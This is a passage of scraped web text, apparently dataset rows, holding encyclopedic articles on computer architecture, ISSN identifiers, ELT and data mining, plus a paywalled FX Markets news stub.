indeed, in some more complex CPU designs, there is another yet smaller computer called a microsequencer, which runs a microcode program that causes all of these events to happen. The control unit, ALU, and registers are collectively known as a central processing unit (CPU). Early CPUs were composed of many separate components. Since the 1970s, CPUs have typically been constructed on a single MOS integrated circuit chip called a microprocessor. The ALU is capable of performing two classes of operations: arithmetic and logic. 111 The set of arithmetic operations that a particular ALU supports may be limited to addition and subtraction, or might include multiplication, division, trigonometry functions such as sine, cosine, etc., and square roots. Some can operate only on whole numbers (integers) while others use floating point to represent real numbers, albeit with limited precision. However, any computer that is capable of performing just the simplest operations can be programmed to break down the more complex operations into simple steps that it can perform. Therefore, any computer can be programmed to perform any arithmetic operation—although it will take more time to do so if its ALU does not directly support the operation. An ALU may also compare numbers and return Boolean truth values (true or false) depending on whether one is equal to, greater than or less than the other ("is 64 greater than 65? ). Logic operations involve Boolean logic: AND, OR, XOR, and NOT. These can be useful for creating complicated conditional statements and processing Boolean logic. Superscalar computers may contain multiple ALUs, allowing them to process several instructions simultaneously. 112 Graphics processors and computers with SIMD and MIMD features often contain ALUs that can perform arithmetic on vectors and matrices. A computer's memory can be viewed as a list of cells into which numbers can be placed or read. Each cell has a numbered "address" and can store a single number. The computer can be instructed to "put the number 123 into the cell numbered 1357" or to "add the number that is in cell 1357 to the number that is in cell 2468 and put the answer into cell 1595. The information stored in memory may represent practically anything. Letters, numbers, even computer instructions can be placed into memory with equal ease. Since the CPU does not differentiate between different types of information, it is the software's responsibility to give significance to what the memory sees as nothing but a series of numbers. In almost all modern computers, each memory cell is set up to store binary numbers in groups of eight bits (called a byte). Each byte is able to represent 256 different numbers (28 256); either from 0 to 255 or 128 to 127. To store larger numbers, several consecutive bytes may be used (typically, two, four or eight). When negative numbers are required, they are usually stored in two's complement notation. Other arrangements are possible, but are usually not seen outside of specialized applications or historical contexts. A computer can store any kind of information in memory if it can be represented numerically. Modern computers have billions or even trillions of bytes of memory. The CPU contains a special set of memory cells called registers that can be read and written to much more rapidly than the main memory area. There are typically between two and one hundred registers depending on the type of CPU. Registers are used for the most frequently needed data items to avoid having to access main memory every time data is needed. As data is constantly being worked on, reducing the need to access main memory (which is often slow compared to the ALU and control units) greatly increases the computer's speed. Computer main memory comes in two principal varieties: RAM can be read and written to anytime the CPU commands it, but ROM is preloaded with data and software that never changes, therefore the CPU can only read from it. ROM is typically used to store the computer's initial start-up instructions. In general, the contents of RAM are erased when the power to the computer is turned off, but ROM retains its data indefinitely. In a PC, the ROM contains a specialized program called the BIOS that orchestrates loading the computer's operating system from the hard disk drive into RAM whenever the computer is turned on or reset. In embedded computers, which frequently do not have disk drives, all of the required software may be stored in ROM. Software stored in ROM is often called firmware, because it is notionally more like hardware than software. Flash memory blurs the distinction between ROM and RAM, as it retains its data when turned off but is also rewritable. It is typically much slower than conventional ROM and RAM however, so its use is restricted to applications where high speed is unnecessary. f In more sophisticated computers there may be one or more RAM cache memories, which are slower than registers but faster than main memory. Generally computers with this sort of cache are designed to move frequently needed data into the cache automatically, often without the need for any intervention on the programmer's part. I O is the means by which a computer exchanges information with the outside world. 114 Devices that provide input or output to the computer are called peripherals. 115 On a typical personal computer, peripherals include input devices like the keyboard and mouse, and output devices such as the display and printer. Hard disk drives, floppy disk drives and optical disc drives serve as both input and output devices. Computer networking is another form of I O. I O devices are often complex computers in their own right, with their own CPU and memory. A graphics processing unit might contain fifty or more tiny computers that perform the calculations necessary to display 3D graphics. citation needed Modern desktop computers contain many smaller computers that assist the main CPU in performing I O. A 2016 era flat screen display contains its own computer circuitry. While a computer may be viewed as running one gigantic program stored in its main memory, in some systems it is necessary to give the appearance of running several programs simultaneously. This is achieved by multitasking i.e. having the computer switch rapidly between running each program in turn. 116 One means by which this is done is with a special signal called an interrupt, which can periodically cause the computer to stop executing instructions where it was and do something else instead. By remembering where it was executing prior to the interrupt, the computer can return to that task later. If several programs are running "at the same time". then the interrupt generator might be causing several hundred interrupts per second, causing a program switch each time. Since modern computers typically execute instructions several orders of magnitude faster than human perception, it may appear that many programs are running at the same time even though only one is ever executing in any given instant. This method of multitasking is sometimes termed "time-sharing" since each program is allocated a "slice" of time in turn. 117 Before the era of inexpensive computers, the principal use for multitasking was to allow many people to share the same computer. Seemingly, multitasking would cause a computer that is switching between several programs to run more slowly, in direct proportion to the number of programs it is running, but most programs spend much of their time waiting for slow input output devices to complete their tasks. If a program is waiting for the user to click on the mouse or press a key on the keyboard, then it will not take a "time slice" until the event it is waiting for has occurred. This frees up time for other programs to execute so that many programs may be run simultaneously without unacceptable speed loss. Some computers are designed to distribute their work across several CPUs in a multiprocessing configuration, a technique once employed in only large and powerful machines such as supercomputers, mainframe computers and servers. Multiprocessor and multi-core (multiple CPUs on a single integrated circuit) personal and laptop computers are now widely available, and are being increasingly used in lower-end markets as a result. Supercomputers in particular often have highly unique architectures that differ significantly from the basic stored-program architecture and from general-purpose computers. g They often feature thousands of CPUs, customized high-speed interconnects, and specialized computing hardware. Such designs tend to be useful for only specialized tasks due to the large scale of program organization required to use most of the available resources at once. Supercomputers usually see usage in large-scale simulation, graphics rendering, and cryptography applications, as well as with other so-called "embarrassingly parallel" tasks. Software refers to parts of the computer which do not have a material form, such as programs, data, protocols, etc. Software is that part of a computer system that consists of encoded information or computer instructions, in contrast to the physical hardware from which the system is built. Computer software includes computer programs, libraries and related non-executable data, such as online documentation or digital media. It is often divided into system software and application software. Computer hardware and software require each other and neither can be realistically used on its own. When software is stored in hardware that cannot easily be modified, such as with BIOS ROM in an IBM PC compatible computer, it is sometimes called "firmware". There are thousands of different programming languages—some intended for general purpose, others useful for only highly specialized applications. The defining feature of modern computers which distinguishes them from all other machines is that they can be programmed. That is to say that some type of instructions (the program) can be given to the computer, and it will process them. Modern computers based on the von Neumann architecture often have machine code in the form of an imperative programming language. In practical terms, a computer program may be just a few instructions or extend to many millions of instructions, as do the programs for word processors and web browsers for example. A typical modern computer can execute billions of instructions per second (gigaflops) and rarely makes a mistake over many years of operation. Large computer programs consisting of several million instructions may take teams of programmers years to write, and due to the complexity of the task almost certainly contain errors. This section applies to most common RAM machine based computers. In most cases, computer instructions are simple: add one number to another, move some data from one location to another, send a message to some external device, etc. These instructions are read from the computer's memory and are generally carried out (executed) in the order they were given. However, there are usually specialized instructions to tell the computer to jump ahead or backwards to some other place in the program and to carry on executing from there. These are called "jump" instructions (or branches). Furthermore, jump instructions may be made to happen conditionally so that different sequences of instructions may be used depending on the result of some previous calculation or some external event. Many computers directly support subroutines by providing a type of jump that "remembers" the location it jumped from and another instruction to return to the instruction following that jump instruction. Program execution might be likened to reading a book. While a person will normally read each word and line in sequence, they may at times jump back to an earlier place in the text or skip sections that are not of interest. Similarly, a computer may sometimes go back and repeat the instructions in some section of the program over and over again until some internal condition is met. This is called the flow of control within the program and it is what allows the computer to perform tasks repeatedly without human intervention. Comparatively, a person using a pocket calculator can perform a basic arithmetic operation such as adding two numbers with just a few button presses. But to add together all of the numbers from 1 to 1,000 would take thousands of button presses and a lot of time, with a near certainty of making a mistake. On the other hand, a computer may be programmed to do this with just a few simple instructions. The following example is written in the MIPS assembly language: Once told to run this program, the computer will perform the repetitive addition task without further human intervention. It will almost never make a mistake and a modern PC can complete the task in a fraction of a second. In most computers, individual instructions are stored as machine code with each instruction being given a unique number (its operation code or opcode for short). The command to add two numbers together would have one opcode; the command to multiply them would have a different opcode, and so on. The simplest computers are able to perform any of a handful of different instructions; the more complex computers have several hundred to choose from, each with a unique numerical code. Since the computer's memory is able to store numbers, it can also store the instruction codes. This leads to the important fact that entire programs (which are just lists of these instructions) can be represented as lists of numbers and can themselves be manipulated inside the computer in the same way as numeric data. The fundamental concept of storing programs in the computer's memory alongside the data they operate on is the crux of the von Neumann, or stored program, architecture. 119 120 In some cases, a computer might store some or all of its program in memory that is kept separate from the data it operates on. This is called the Harvard architecture after the Harvard Mark I computer. Modern von Neumann computers display some traits of the Harvard architecture in their designs, such as in CPU caches. While it is possible to write computer programs as long lists of numbers (machine language) and while this technique was used with many early computers, h it is extremely tedious and potentially error-prone to do so in practice, especially for complicated programs. Instead, each basic instruction can be given a short name that is indicative of its function and easy to remember a mnemonic such as ADD, SUB, MULT or JUMP. These mnemonics are collectively known as a computer's assembly language. Converting programs written in assembly language into something the computer can actually understand (machine language) is usually done by a computer program called an assembler. Programming languages provide various ways of specifying programs for computers to run. Unlike natural languages, programming languages are designed to permit no ambiguity and to be concise. They are purely written languages and are often difficult to read aloud. They are generally either translated into machine code by a compiler or an assembler before being run, or translated directly at run time by an interpreter. Sometimes programs are executed by a hybrid method of the two techniques. Machine languages and the assembly languages that represent them (collectively termed low-level programming languages) are generally unique to the particular architecture of a computer's central processing unit (CPU). For instance, an ARM architecture CPU (such as may be found in a smartphone or a hand-held videogame) cannot understand the machine language of an x86 CPU that might be in a PC. i Historically a significant number of other cpu architectures were created and saw extensive use, notably including the MOS Technology 6502 and 6510 in addition to the Zilog Z80. Although considerably easier than in machine language, writing long programs in assembly language is often difficult and is also error prone. Therefore, most practical programs are written in more abstract high-level programming languages that are able to express the needs of the programmer more conveniently (and thereby help reduce programmer error). High level languages are usually "compiled" into machine language (or sometimes into assembly language and then into machine language) using another computer program called a compiler. j High level languages are less related to the workings of the target computer than assembly language, and more related to the language and structure of the problem(s) to be solved by the final program. It is therefore often possible to use different compilers to translate the same high level language program into the machine language of many different types of computer. This is part of the means by which software like video games may be made available for different computer architectures such as personal computers and various video game consoles. Program design of small programs is relatively simple and involves the analysis of the problem, collection of inputs, using the programming constructs within languages, devising or using established procedures and algorithms, providing data for output devices and solutions to the problem as applicable. 121 As problems become larger and more complex, features such as subprograms, modules, formal documentation, and new paradigms such as object-oriented programming are encountered. 122 Large programs involving thousands of line of code and more require formal software methodologies. 123 The task of developing large software systems presents a significant intellectual challenge. 124 Producing software with an acceptably high reliability within a predictable schedule and budget has historically been difficult; 125 the academic and professional discipline of software engineering concentrates specifically on this challenge. 126 Errors in computer programs are called "bugs". They may be benign and not affect the usefulness of the program, or have only subtle effects. However, in some cases they may cause the program or the entire system to "hang", becoming unresponsive to input such as mouse clicks or keystrokes, to completely fail, or to crash. 127 Otherwise benign bugs may sometimes be harnessed for malicious intent by an unscrupulous user writing an exploit, code designed to take advantage of a bug and disrupt a computer's proper execution. Bugs are usually not the fault of the computer. Since computers merely execute the instructions they are given, bugs are nearly always the result of programmer error or an oversight made in the program's design. k Admiral Grace Hopper, an American computer scientist and developer of the first compiler, is credited for having first used the term "bugs" in computing after a dead moth was found shorting a relay in the Harvard Mark II computer in September 1947. 128 Computers have been used to coordinate information between multiple locations since the 1950s. The U.S. military's SAGE system was the first large-scale example of such a system, which led to a number of special-purpose commercial systems such as Sabre. 129 In the 1970s, computer engineers at research institutions throughout the United States began to link their computers together using telecommunications technology. The effort was funded by ARPA (now DARPA), and the computer network that resulted was called the ARPANET. 130 The technologies that made the Arpanet possible spread and evolved. In time, the network spread beyond academic and military institutions and became known as the Internet. The emergence of networking involved a redefinition of the nature and boundaries of the computer. Computer operating systems and applications were modified to include the ability to define and access the resources of other computers on the network, such as peripheral devices, stored information, and the like, as extensions of the resources of an individual computer. Initially these facilities were available primarily to people working in high-tech environments, but in the 1990s the spread of applications like e-mail and the World Wide Web, combined with the development of cheap, fast networking technologies like Ethernet and ADSL saw computer networking become almost ubiquitous. In fact, the number of computers that are networked is growing phenomenally. A very large proportion of personal computers regularly connect to the Internet to communicate and receive information. "Wireless" networking, often utilizing mobile phone networks, has meant networking is becoming increasingly ubiquitous even in mobile computing environments. A computer does not need to be electronic, nor even have a processor, nor RAM, nor even a hard disk. While popular usage of the word "computer" is synonymous with a personal electronic computer, l a typical modern definition of a computer is: "A device that computes, especially a programmable usually electronic machine that performs high-speed mathematical or logical operations or that assembles, stores, correlates, or otherwise processes information. 131 According to this definition, any device that processes information qualifies as a computer. There is active research to make non-classical computers out of many promising new types of technology, such as optical computers, DNA computers, neural computers, and quantum computers. Most computers are universal, and are able to calculate any computable function, and are limited only by their memory capacity and operating speed. However different designs of computers can give very different performance for particular problems; for example quantum computers can potentially break some modern encryption algorithms (by quantum factoring) very quickly. There are many types of computer architectures: Of all these abstract machines, a quantum computer holds the most promise for revolutionizing computing. 132 Logic gates are a common abstraction which can apply to most of the above digital or analog paradigms. The ability to store and execute lists of instructions called programs makes computers extremely versatile, distinguishing them from calculators. The Church Turing thesis is a mathematical statement of this versatility: any computer with a minimum capability (being Turing-complete) is, in principle, capable of performing the same tasks that any other computer can perform. Therefore, any type of computer (netbook, supercomputer, cellular automaton, etc.) is able to perform the same computational tasks, given enough time and storage capacity. A computer will solve problems in exactly the way it is programmed to, without regard to efficiency, alternative solutions, possible shortcuts, or possible errors in the code. Computer programs that learn and adapt are part of the emerging field of artificial intelligence and machine learning. Artificial intelligence based products generally fall into two major categories: rule-based systems and pattern recognition systems. Rule-based systems attempt to represent the rules used by human experts and tend to be expensive to develop. Pattern-based systems use data about a problem to generate conclusions. Examples of pattern-based systems include voice recognition, font recognition, translation and the emerging field of on-line marketing. As the use of computers has spread throughout society, there are an increasing number of careers involving computers. The need for computers to work well together and to be able to exchange information has spawned the need for many standards organizations, clubs and societies of both a formal and informal nature. |
598 | https://en.wikipedia.org/wiki/Data_scraping | http://www.fxweek.com/fx-week/news/1539599/contributors-fret-about-reuters-plan-to-switch-from-monitor-network-to-idn | You are currently accessing FX Markets via your Enterprise account. If you already have an account please use the link below to sign in. If you have any problems with your access or would like to request an individual access account please contact our customer service team. Phone: 1 44 (0)870 240 8859 Email: csqueries infopro-digital.com The banks who contribute "rates" to Reuters Holdings PLC’s market data services remain in the dark about how they will deliver those rates to Reuters’ Integrated Data Network (IDN) based services once the current mechanism is dismantled. Reuters is in the process of switching delivery of its real-time market data services to IDN from the aging Monitor network. Although the switch from Reuters’ current Monitor contributors’ network is still more than a year away, contributors and systems Only users who have a paid subscription or are part of a corporate subscription are able to print or copy content. To access these options, along with all other subscription benefits, please contact customer services - www.fx-markets.com static contact-us, or view our subscription options here: https: subscriptions.fx-markets.com subscribe You are currently unable to print this content. Please contact customer services - www.fx-markets.com static contact-us to find out more. You are currently unable to copy this content. Please contact info fx-markets.com to find out more. Copyright Infopro Digital Limited. All rights reserved. As outlined in our terms and conditions, https: www.infopro-digital.com terms-and-conditions subscriptions (point 2.4), printing is limited to a single copy. If you would like to purchase additional rights please email info fx-markets.com Copyright Infopro Digital Limited. All rights reserved. You may share this content using our article tools. As outlined in our terms and conditions, https: www.infopro-digital.com terms-and-conditions subscriptions (clause 2.4), an Authorised User may only make one copy of the materials for their own personal use. You must also comply with the restrictions in clause 2.5. If you would like to purchase additional rights please email info fx-markets.com Please try again later. Get in touch with our customer services team if this issue persists. New to FX Markets? View our subscription options If you already have an account, please sign in here. Technology provider aims to reduce trade reconciliations for Deutsche, Saxo and XTX Tie-up enables TradAir customers to leverage services of Zero Hash subsidiary Firm collaborates with Genesis to automate exercise and options expiry Cloud-based FX post-trade product provides data archiving, aimed at easing compliance and cost burdens Danish bank will use provider’s independent FX data for better analytics Firm will supplement its current management with existing ITG leadership globally Cobalt’s platform now connects to MarkitServ’s network of counterparties The bank is exploring using the technology to help corporates manage FX flows better You need to sign in to use this feature. If you don’t have a FX Markets account, please register for a trial. Support Services Legal Privacy Useful links Infopro Digital Risk (IP) Limited (2024). All rights reserved. Published by Infopro Digital Services Limited, 133 Houndsditch, London, EC3A 7BX. Companies are registered in England and Wales with company registration numbers 09232733 04699701 You need to sign in to use this feature. If you don’t have a FX Markets account, please register for a trial. To use this feature you will need an individual account. If you have one already please sign in. Alternatively you can request an indvidual account here: |
599 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Extract,_load,_transform | Extract, load, transform (ELT) is an alternative to extract, transform, load (ETL) used with data lake implementations. In contrast to ETL, in ELT models the data is not transformed on entry to the data lake, but stored in its original raw format. This enables faster loading times. However, ELT requires sufficient processing power within the data processing engine to carry out the transformation on demand, to return the results in a timely manner. 1 2 Since the data is not processed on entry to the data lake, the query and schema do not need to be defined a priori (although often the schema will be available during load since many data sources are extracts from databases or similar structured data systems and hence have an associated schema). ELT is a data pipeline model. 3 4 Some of the benefits of an ELT process include speed and the ability to handle both structured and unstructured data. 5 This computing article is a stub. You can help Wikipedia by expanding it. |
600 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/ISSN_(identifier) | An International Standard Serial Number (ISSN) is an eight-digit serial number used to uniquely identify a serial publication (periodical), such as a magazine. 1 The ISSN is especially helpful in distinguishing between serials with the same title. ISSNs are used in ordering, cataloging, interlibrary loans, and other practices in connection with serial literature. 2 The ISSN system was first drafted as an International Organization for Standardization (ISO) international standard in 1971 and published as ISO 3297 in 1975. 3 ISO subcommittee TC 46 SC 9 is responsible for maintaining the standard. When a serial with the same content is published in more than one media type, a different ISSN is assigned to each media type. For example, many serials are published both in print and electronic media. The ISSN system refers to these types as print ISSN (p-ISSN) and electronic ISSN (e-ISSN). 4 Consequently, as defined in ISO 3297:2007, every serial in the ISSN system is also assigned a linking ISSN (ISSN-L), typically the same as the ISSN assigned to the serial in its first published medium, which links together all ISSNs assigned to the serial in every medium. 5 An ISSN is an eight-digit code, divided by a hyphen into two four-digit numbers. 1 The last digit, which may be zero through nine or an X, is a check digit, so the ISSN is uniquely represented by its first seven digits. Formally, the general form of the ISSN (also named "ISSN structure" or "ISSN syntax") can be expressed as follows: 6 where N is in the set 0,1,2,...,9 , a decimal digit character, and C is in 0,1,2,...,9,X ; or by a Perl Compatible Regular Expressions (PCRE) regular expression: For example, the ISSN of the journal Hearing Research, is 0378 5955, where the final 5 is the check digit, that is C 5. To calculate the check digit, the following algorithm may be used: 0 8 3 7 7 6 8 5 5 4 9 3 5 2 0 21 42 40 20 27 10 160 . displaystyle begin aligned 0 cdot 8 3 cdot 7 7 cdot 6 8 cdot 5 5 cdot 4 9 cdot 3 5 cdot 2 0 21 42 40 20 27 10 160 ;. end aligned The remainder of this sum modulo 11 is then calculated: 160 11 14 remainder 6 14 6 11 displaystyle frac 160 11 14 mbox remainder 6 14 frac 6 11 If there is no remainder, the check digit is 0; otherwise the remainder is subtracted from 11. If the result is less than 10, it yields the check digit: 11 6 5 . displaystyle 11 6 5 ;. Thus, in this example, the check digit C is 5. To confirm the check digit, calculate the sum of all eight digits of the ISSN multiplied by their position in the number, counting from the right. (If the check digit is X, add 10 to the sum.) The remainder of the sum modulo 11 must be 0. There is an online ISSN checker that can validate an ISSN, based on the above algorithm. 7 ISSNs can be encoded in EAN 13 bar codes with a 977 "country code" (compare the 978 country code ("bookland") for ISBNs), followed by the 7 main digits of the ISSN (the check digit is not included), followed by 2 publisher-defined digits, followed by the EAN check digit (which need not match the ISSN check digit). 8 ISSN codes are assigned by a network of ISSN National Centres, usually located at national libraries and coordinated by the ISSN International Centre based in Paris. The International Centre is an intergovernmental organization created in 1974 through an agreement between UNESCO and the French government. ISSN-L is a unique identifier for all versions of the serial containing the same content across different media. As defined by ISO 3297:2007, the "linking ISSN (ISSN-L) provides a mechanism for collocation or linking among the different media versions of the same continuing resource. The ISSN-L is one of a serial's existing ISSNs, so does not change the use or assignment of "ordinary" ISSNs; 9 it is based on the ISSN of the first published medium version of the publication. If the print and online versions of the publication are published at the same time, the ISSN of the print version is chosen as the basis of the ISSN-L. With ISSN-L is possible to designate one single ISSN for all those media versions of the title. The use of ISSN-L facilitates search, retrieval and delivery across all media versions for services like OpenURL, library catalogues, search engines or knowledge bases. The International Centre maintains a database of all ISSNs assigned worldwide, the ISDS Register (International Serials Data System), otherwise known as the ISSN Register. At the end of 2016, update the ISSN Register contained records for 1,943,572 items. 10 The Register is not freely available for interrogation on the web, but is available by subscription. ISSN and ISBN codes are similar in concept, where ISBNs are assigned to individual books. An ISBN might be assigned for particular issues of a serial, in addition to the ISSN code for the serial as a whole. An ISSN, unlike the ISBN code, is an anonymous identifier associated with a serial title, containing no information as to the publisher or its location. For this reason a new ISSN is assigned to a serial each time it undergoes a major title change. Since the ISSN applies to an entire serial, other identifiers have been built on top of it to allow references to specific volumes, articles, or other identifiable components (like the table of contents): the Publisher Item Identifier (PII) and the Serial Item and Contribution Identifier (SICI). Separate ISSNs are needed for serials in different media (except reproduction microforms). Thus, the print and electronic media versions of a serial need separate ISSNs, 11 and CD-ROM versions and web versions require different ISSNs. However, the same ISSN can be used for different file formats (e.g. PDF and HTML) of the same online serial. This "media-oriented identification" of serials made sense in the 1970s. In the 1990s and onward, with personal computers, better screens, and the Web, it makes sense to consider only content, independent of media. This "content-oriented identification" of serials was a repressed demand during a decade, but no ISSN update or initiative occurred. A natural extension for ISSN, the unique-identification of the articles in the serials, was the main demand application. An alternative serials' contents model arrived with the indecs Content Model and its application, the digital object identifier (DOI), an ISSN-independent initiative, consolidated in the 2000s. Only later, in 2007, ISSN-L was defined in the new ISSN standard (ISO 3297:2007) as an "ISSN designated by the ISSN Network to enable collocation or versions of a continuing resource linking among the different media". 12 An ISSN can be encoded as a uniform resource name (URN) by prefixing it with "urn:ISSN: . 6 For example, Rail could be referred to as "urn:ISSN:0953 4563". URN namespaces are case-sensitive, and the ISSN namespace is all caps. 13 If the checksum digit is "X" then it is always encoded in uppercase in a URN. The URNs are content-oriented, but ISSN is media-oriented: A unique URN for serials simplifies the search, recovery and delivery of data for various services including, in particular, search systems and knowledge databases. 12 ISSN-L (see Linking ISSN above) was created to fill this gap. The two standard categories of media in which serials are most available are print and electronic. In metadata contexts (e.g., JATS), these may have standard labels. p-ISSN is a standard label for "Print ISSN", the ISSN for the print media (paper) version of a serial. Usually it is the "default media" and so the "default ISSN". e-ISSN (or eISSN) is a standard label for "Electronic ISSN", the ISSN for the electronic media (online) version of a serial. 15 |
601 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Special:RecentChangesLinked/Web_scraping | Enter a page name to see changes on pages linked to or from that page. (To see members of a category, enter Category:Name of category). Changes to pages on your Watchlist are shown in bold with a green bullet. See more at Help:Related changes. |
602 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_mining | Data mining is the process of extracting and discovering patterns in large data sets involving methods at the intersection of machine learning, statistics, and database systems. 1 Data mining is an interdisciplinary subfield of computer science and statistics with an overall goal of extracting information (with intelligent methods) from a data set and transforming the information into a comprehensible structure for further use. 1 2 3 4 Data mining is the analysis step of the "knowledge discovery in databases" process, or KDD. 5 Aside from the raw analysis step, it also involves database and data management aspects, data pre-processing, model and inference considerations, interestingness metrics, complexity considerations, post-processing of discovered structures, visualization, and online updating. 1 The term "data mining" is a misnomer because the goal is the extraction of patterns and knowledge from large amounts of data, not the extraction (mining) of data itself. 6 It also is a buzzword 7 and is frequently applied to any form of large-scale data or information processing (collection, extraction, warehousing, analysis, and statistics) as well as any application of computer decision support system, including artificial intelligence (e.g., machine learning) and business intelligence. Often the more general terms (large scale) data analysis and analytics—or, when referring to actual methods, artificial intelligence and machine learning—are more appropriate. The actual data mining task is the semi-automatic or automatic analysis of large quantities of data to extract previously unknown, interesting patterns such as groups of data records (cluster analysis), unusual records (anomaly detection), and dependencies (association rule mining, sequential pattern mining). This usually involves using database techniques such as spatial indices. These patterns can then be seen as a kind of summary of the input data, and may be used in further analysis or, for example, in machine learning and predictive analytics. For example, the data mining step might identify multiple groups in the data, which can then be used to obtain more accurate prediction results by a decision support system. Neither the data collection, data preparation, nor result interpretation and reporting is part of the data mining step, although they do belong to the overall KDD process as additional steps. The difference between data analysis and data mining is that data analysis is used to test models and hypotheses on the dataset, e.g., analyzing the effectiveness of a marketing campaign, regardless of the amount of data. In contrast, data mining uses machine learning and statistical models to uncover clandestine or hidden patterns in a large volume of data. 8 The related terms data dredging, data fishing, and data snooping refer to the use of data mining methods to sample parts of a larger population data set that are (or may be) too small for reliable statistical inferences to be made about the validity of any patterns discovered. These methods can, however, be used in creating new hypotheses to test against the larger data populations. In the 1960s, statisticians and economists used terms like data fishing or data dredging to refer to what they considered the bad practice of analyzing data without an a-priori hypothesis. The term "data mining" was used in a similarly critical way by economist Michael Lovell in an article published in the Review of Economic Studies in 1983. 9 10 Lovell indicates that the practice "masquerades under a variety of aliases, ranging from "experimentation" (positive) to "fishing" or "snooping" (negative). The term data mining appeared around 1990 in the database community, with generally positive connotations. For a short time in 1980s, the phrase "database mining" , was used, but since it was trademarked by HNC, a San Diego-based company, to pitch their Database Mining Workstation; 11 researchers consequently turned to data mining. Other terms used include data archaeology, information harvesting, information discovery, knowledge extraction, etc. Gregory Piatetsky-Shapiro coined the term "knowledge discovery in databases" for the first workshop on the same topic (KDD 1989) and this term became more popular in the AI and machine learning communities. However, the term data mining became more popular in the business and press communities. 12 Currently, the terms data mining and knowledge discovery are used interchangeably. The manual extraction of patterns from data has occurred for centuries. Early methods of identifying patterns in data include Bayes' theorem (1700s) and regression analysis (1800s). 13 The proliferation, ubiquity and increasing power of computer technology have dramatically increased data collection, storage, and manipulation ability. As data sets have grown in size and complexity, direct "hands-on" data analysis has increasingly been augmented with indirect, automated data processing, aided by other discoveries in computer science, specially in the field of machine learning, such as neural networks, cluster analysis, genetic algorithms (1950s), decision trees and decision rules (1960s), and support vector machines (1990s). Data mining is the process of applying these methods with the intention of uncovering hidden patterns. 14 in large data sets. It bridges the gap from applied statistics and artificial intelligence (which usually provide the mathematical background) to database management by exploiting the way data is stored and indexed in databases to execute the actual learning and discovery algorithms more efficiently, allowing such methods to be applied to ever-larger data sets. The knowledge discovery in databases (KDD) process is commonly defined with the stages: It exists, however, in many variations on this theme, such as the Cross-industry standard process for data mining (CRISP-DM) which defines six phases: or a simplified process such as (1) Pre-processing, (2) Data Mining, and (3) Results Validation. Polls conducted in 2002, 2004, 2007 and 2014 show that the CRISP-DM methodology is the leading methodology used by data miners. 15 16 17 18 The only other data mining standard named in these polls was SEMMA. However, 3 4 times as many people reported using CRISP-DM. Several teams of researchers have published reviews of data mining process models, 19 and Azevedo and Santos conducted a comparison of CRISP-DM and SEMMA in 2008. 20 Before data mining algorithms can be used, a target data set must be assembled. As data mining can only uncover patterns actually present in the data, the target data set must be large enough to contain these patterns while remaining concise enough to be mined within an acceptable time limit. A common source for data is a data mart or data warehouse. Pre-processing is essential to analyze the multivariate data sets before data mining. The target set is then cleaned. Data cleaning removes the observations containing noise and those with missing data. Data mining involves six common classes of tasks: 5 Data mining can unintentionally be misused, producing results that appear to be significant but which do not actually predict future behavior and cannot be reproduced on a new sample of data, therefore bearing little use. This is sometimes caused by investigating too many hypotheses and not performing proper statistical hypothesis testing. A simple version of this problem in machine learning is known as overfitting, but the same problem can arise at different phases of the process and thus a train test split—when applicable at all—may not be sufficient to prevent this from happening. 21 The final step of knowledge discovery from data is to verify that the patterns produced by the data mining algorithms occur in the wider data set. Not all patterns found by the algorithms are necessarily valid. It is common for data mining algorithms to find patterns in the training set which are not present in the general data set. This is called overfitting. To overcome this, the evaluation uses a test set of data on which the data mining algorithm was not trained. The learned patterns are applied to this test set, and the resulting output is compared to the desired output. For example, a data mining algorithm trying to distinguish "spam" from "legitimate" e-mails would be trained on a training set of sample e-mails. Once trained, the learned patterns would be applied to the test set of e-mails on which it had not been trained. The accuracy of the patterns can then be measured from how many e-mails they correctly classify. Several statistical methods may be used to evaluate the algorithm, such as ROC curves. If the learned patterns do not meet the desired standards, it is necessary to re-evaluate and change the pre-processing and data mining steps. If the learned patterns do meet the desired standards, then the final step is to interpret the learned patterns and turn them into knowledge. The premier professional body in the field is the Association for Computing Machinery's (ACM) Special Interest Group (SIG) on Knowledge Discovery and Data Mining (SIGKDD). 22 23 Since 1989, this ACM SIG has hosted an annual international conference and published its proceedings, 24 and since 1999 it has published a biannual academic journal titled "SIGKDD Explorations". 25 Computer science conferences on data mining include: Data mining topics are also present in many data management database conferences such as the ICDE Conference, SIGMOD Conference and International Conference on Very Large Data Bases. There have been some efforts to define standards for the data mining process, for example, the 1999 European Cross Industry Standard Process for Data Mining (CRISP-DM 1.0) and the 2004 Java Data Mining standard (JDM 1.0). Development on successors to these processes (CRISP-DM 2.0 and JDM 2.0) was active in 2006 but has stalled since. JDM 2.0 was withdrawn without reaching a final draft. For exchanging the extracted models—in particular for use in predictive analytics—the key standard is the Predictive Model Markup Language (PMML), which is an XML-based language developed by the Data Mining Group (DMG) and supported as exchange format by many data mining applications. As the name suggests, it only covers prediction models, a particular data mining task of high importance to business applications. However, extensions to cover (for example) subspace clustering have been proposed independently of the DMG. 26 Data mining is used wherever there is digital data available. Notable examples of data mining can be found throughout business, medicine, science, finance, construction, and surveillance. While the term "data mining" itself may have no ethical implications, it is often associated with the mining of information in relation to user behavior (ethical and otherwise). 27 The ways in which data mining can be used can in some cases and contexts raise questions regarding privacy, legality, and ethics. 28 In particular, data mining government or commercial data sets for national security or law enforcement purposes, such as in the Total Information Awareness Program or in ADVISE, has raised privacy concerns. 29 30 Data mining requires data preparation which uncovers information or patterns which compromise confidentiality and privacy obligations. A common way for this to occur is through data aggregation. Data aggregation involves combining data together (possibly from various sources) in a way that facilitates analysis (but that also might make identification of private, individual-level data deducible or otherwise apparent). 31 This is not data mining per se, but a result of the preparation of data before—and for the purposes of—the analysis. The threat to an individual's privacy comes into play when the data, once compiled, cause the data miner, or anyone who has access to the newly compiled data set, to be able to identify specific individuals, especially when the data were originally anonymous. 32 It is recommended according to whom? to be aware of the following before data are collected: 31 Data may also be modified so as to become anonymous, so that individuals may not readily be identified. 31 However, even "anonymized" data sets can potentially contain enough information to allow identification of individuals, as occurred when journalists were able to find several individuals based on a set of search histories that were inadvertently released by AOL. 33 The inadvertent revelation of personally identifiable information leading to the provider violates Fair Information Practices. This indiscretion can cause financial, emotional, or bodily harm to the indicated individual. In one instance of privacy violation, the patrons of Walgreens filed a lawsuit against the company in 2011 for selling prescription 